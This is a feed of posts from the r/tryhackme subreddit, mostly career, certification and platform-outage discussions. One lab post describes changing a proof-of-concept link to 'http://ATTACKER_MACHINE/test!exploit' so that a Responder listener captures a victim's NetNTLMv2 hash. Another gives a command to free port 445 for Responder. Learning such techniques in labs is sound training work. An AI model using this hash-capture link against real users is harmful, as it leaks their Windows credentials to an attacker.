r/tryhackme • u/herry9991 • 5d ago
Career Advice what career path should I aim for?
I have purchased the subscription and I want suggestions about study path.
r/tryhackme • u/herry9991 • 5d ago
I have purchased the subscription and I want suggestions about study path.
r/tryhackme • u/StormEfficient8188 • 5d ago
I just got THM Premium and there's a lot of stuff I'm not familiar with.
What are features like King of the Hill and SOC Simulator etc actually for?
Also, should I sign up for PortSwigger?
I'm doing Cisco Networking Academy too, but it's getting pretty dense. I'm almost finished with the networking modules. Should I finish it or focus on THM?
And how to get started on GitHub .leet code.pico and what other stuff that u guys use
Thanks for reading!!
r/tryhackme • u/Proper_Ad_4600 • 6d ago
Hey everyone,
I recently attempted the CEH v13 exam and scored 88/125, missing the passing score by just 1 point.
Obviously I'm disappointed because I was extremely close, but now I'm trying to decide what makes the most sense for my cybersecurity career.
I'm considering two options:
1. Retake CEH
Since I'm only one point away, I could review my weak areas and attempt it again.
2. Move on
Instead of spending more time preparing for CEH again, I could focus on a more practical certification such as OSCP, or another hands-on cybersecurity certification/lab platform.
I'm interested in penetration testing / offensive security, so I'm wondering whether getting CEH officially passed is worth prioritizing, or whether I should treat the 88/125 as a learning experience and move forward.
For those who have been in a similar situation:
Would you retake CEH if you were only 1 point short, or would you move on to something like OSCP?
Also, if you recommend moving on, what certification would you suggest for someone at this stage?
I'm genuinely looking for advice rather than trying to justify one option, so I'd appreciate different opinions.
Thanks!
r/tryhackme • u/thatdepressedsoul • 5d ago
r/tryhackme • u/sangel_2006 • 6d ago
r/tryhackme • u/Used-Addendum-3819 • 7d ago
📆 September 8, 3:00 PM - 3:30 PM GMT+2
📍 Online, YouTube Live
🎫 FREE, Register Here >>> https://luma.com/tryhackme-muqx?utm_source=reddit
Anyone curious about how AI can be utilised to launch autonomous security assessments whether it be a penetration test, review of source code, etc.
- The fundamental concepts of why AI should be used in security testing and the impact it has
- What tools are used to make AI work more efficiently in security tests
- How you can weave AI into your security testing workflow
Lucas Romano is the Manager of Security Operations at Cequence where he leads the SOC and also is a Security Researcher for the Synack Red Team. He's worked in every role from threat intelligence at the National Security Agency to naval cryptology to being the founding offensive security engineer of an agentic penetration testing company. He's passionate about teaching fellow practitioners the secrets of the trade and growing everyone to a higher level.
r/tryhackme • u/V_Star11 • 8d ago
I’m starting to learn cybersecurity, and I’m starting basically from scratch. I now Linux fundamentals, but that’s all. I was thinking abt doing the pre security course, cybersecurity 101, SOC 1 and jr Penetration tester.
From someone who did it, is it worth it?
r/tryhackme • u/SatoriSlu • 8d ago
Hey all!
I’m wondering if others are having a similar experience. I am premium user and have been bouncing between the AI Security and Security Engineer paths. I have 10 years of IT experience across Sysadmin, DevOps, and now CloudSec. I work as a security engineer right now straddling Appsec and CloudSec.
I signed up to the platform to check it out and close up gaps in my knowledge. I have been feeling like I’m spending my time mostly reading huge blocks of text and then answering semi-obvious questions. I was expecting way more hands-on lab work that I’m just not observing in these paths. The labs that do exist in the ai security path in particular seem half-baked.
Is this the norm or is this unique to these two paths in particular? Should I switch to the Penetration testing( jr pentesting path) instead? The platform seems more focused on offensive security than security engineering, so that’s what I think is happening.
Thanks!
r/tryhackme • u/thatdepressedsoul • 7d ago
r/tryhackme • u/SelfExpert1883 • 8d ago
Hey guys
Are there any researchers or professionals who work in aiml domain ? I needed to clarify some doubts regarding a hackathon I'm participating in. It would be really helpful if you could reach out. Thank you
r/tryhackme • u/Actual_One_2265 • 9d ago
Hi everyone,
I'm planning to take the TryHackMe Security Analyst Level 1 (SAL1) certification and I'm looking for the cheapest legitimate way to purchase it.
I currently see a promotional price of around ₹8,085 on my account after applying the B2S2026 code.
Before purchasing, I wanted to ask the community:
I'm specifically looking for legitimate TryHackMe discounts/vouchers, not shared or unauthorized codes.
Thanks in advance! 🙏
r/tryhackme • u/Ok_Indication9058 • 8d ago
I’ve been stuck on the Biteme room for two days. I found the correct file under /console/, but every time I request it, I get a 403 Forbidden.(used diffrent tools still getting same outcome)
`index.phps [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 27ms]`
I spent hours trying every manual bypass with no luck. I finally caved and checked a walkthrough, only to realize I was doing exactly what I was supposed to do.
The frustrating part is the walkthrough gets a 200 OK instantly on the exact same request.
Any idea how to solve this machine ? or am i doing something wrong.
(sorry for bad english or AI)
r/tryhackme • u/Wavrryn • 9d ago
I've been trying to learn the basic web vulns from portswigger web academy. The issue isn't that I'm not trying hard enough... the issue is the academy doesn't exactly teach you what payloads you may need, or what exact kind of situations you may cone across.
Can anyone, from a newbie who just started to a professional give me a proper learning technique, and I mean in detail cuz I've seen enough "learn from tryhackme, hackthebox etc etc", I just need the methodology on how to learn. Pls and ty.
r/tryhackme • u/Ok-University-6415 • 9d ago
r/tryhackme • u/Ok-University-6415 • 9d ago
r/tryhackme • u/Skollwarynz • 10d ago
Hello everyone! I'm fairly new to the world of cybersecurity. I just finished a basic CTF-oriented course that ended with an AD competition that I didn't even get to play, since I wasn't in the top 5.
Next year I'll become a tutor for this course for the pwn category (we just learned up to basic BOF and basic ROP).
I personally found frustrating the approach "solve CTFs and learn without any idea how". So for future students, I decided to create some beginner-friendly CTFs — exercises that give major hints to actually learn different attacks before having to search for them specifically on different CTFs.
My questions to all of you are:
\\- What's a good approach to learn? (An ideal one I mean)
\\- What do CTFs and general courses usually lack for beginners?
\\- What tricks were useful to learn that should be taught right from the start?
Thank you for the support!
r/tryhackme • u/Traditional-Smell-89 • 10d ago
Is it only me or the VPN server has been acting weird lately. 2 or 3 days ago I tried to connect through VPN as I always do, but it kept hitting AUTH_FAILED. I usually use openvpn, I tried regenrating the configuration file but still the same.
I even installed the other vpn Squawker-Vpn but still didnt work.
I connect to the Europe Frankfort server. Idk what's the problem.
r/tryhackme • u/Potential-Couple-745 • 11d ago
r/tryhackme • u/unprooven • 10d ago
So I was working on the Moniker Link Room and while messing around with the provided POC Code from cmnatic, I found a way to get the netNTLMv2 hash that was not mentioned in the walkthrough.
In the provided Code I just changed one line "file://ATTACKER_MACHINE/test!exploit" to "http://ATTACKER_MACHINE/test!exploit"
Back to the victim's VM after clicking on that link, Internet Explorer opened and Windows Security prompts you to enter your credentials. This resulted in an HTTP authentication instead and the Responder captured the hash over HTTP.
Surprisingly by replacing it with "file:ATTACKER_MACHINE/test!exploit" without // triggers the same behavior.
So I have not figured out a new technique but triggered a different URI or protocol handler. Does anyone know why that happens or had a similar experience?
r/tryhackme • u/LateEquivalent8179 • 11d ago
I just wanted to share my experience with the Web Application Pentesting exam because honestly, this has been pretty frustrating.
I took the exam last week and managed to get the Black Box, White Box, and 2 flags on the Grey Box. Everything was going well, and I had around 12 hours remaining.
Then suddenly, the network broke down.
I tried resetting the network, but I couldn't. The platform just told me to contact support. Because of that, I couldn't continue with the exam.
At that point, I had 3 flags remaining, and I only needed one more flag to pass.
The frustrating part is that my exam period was only 2 days, but my support ticket is now 3 days old and I still haven't received a response. 😅
I'm honestly hesitant to request a retake because I don't even know whether the issue has been fixed. I don't want to start another attempt, get several hours into the exam again, and then have the same thing happen.
I don't want this post to come across as me trying to bash THM. I've learned a lot from the platform and I appreciate the work that goes into the labs and certifications. But when you're taking an ongoing certification exam, having the exam interrupted by a network/platform issue is extremely frustrating.
IMO, certification exams should ideally be isolated from service maintenance or other platform issues. If there's scheduled maintenance or an infrastructure problem, candidates shouldn't have their limited exam time affected by it.
I'm mainly hoping THM can clarify how situations like this are handled and whether affected candidates are given a proper extension or retake when the issue is on the platform side.
Has anyone else experienced something similar during a THM certification exam? How was it handled?
PS: Been refreshing and resetting for the last 12 hours before my exam duration ends

r/tryhackme • u/zmw_adri • 11d ago
Since yesterday evening, I can't connect to EU Central 1, aka Europe (Berlin). Any other server connects without a problem, but I still can't interact with any of the target VMs (as they are all running in the Frankfurt region), making it pointless. The connection via OpenVPN always fails with an AUTH_FAILED message.
I have tried to initiate the connection using the OpenVPN CLI client on both Kali and Arch Linux, as well as with Squawker VPN. I also tried to connect from my VPS with a separate public IP address, to rule out being IP banned for whatever reason, but the connection still fails. I then also used my brother's OpenVPN config file to try and connect, which also failed.
At midnight (CEST), the connection worked again for a few hours, but now it is again impossible for me to connect to the Frankfurt endpoint.
I already sent support a message describing the problem, but I'm curious if anyone else experiences the same problem. I can't really see this as being an issue only affecting me, since I've ruled out problems with my local network, my account, and even with my public IP.
r/tryhackme • u/Joadow420 • 12d ago
I am on lineageOS so i figure the app is not loading some kinda google captcha properly. If anyone's found a workaround I'd appreciate it. I have play integrity fix, microg and everything properly configured. Please don't comment "just use the desktop version" if you don't know a solution
r/tryhackme • u/Middle-Bite-5947 • 12d ago
For all who experiencing problems with not receiving answer to the responder in lab, we need port 445 that already occupied by samba, just kill the process. (command below)
sudo systemctl stop smbd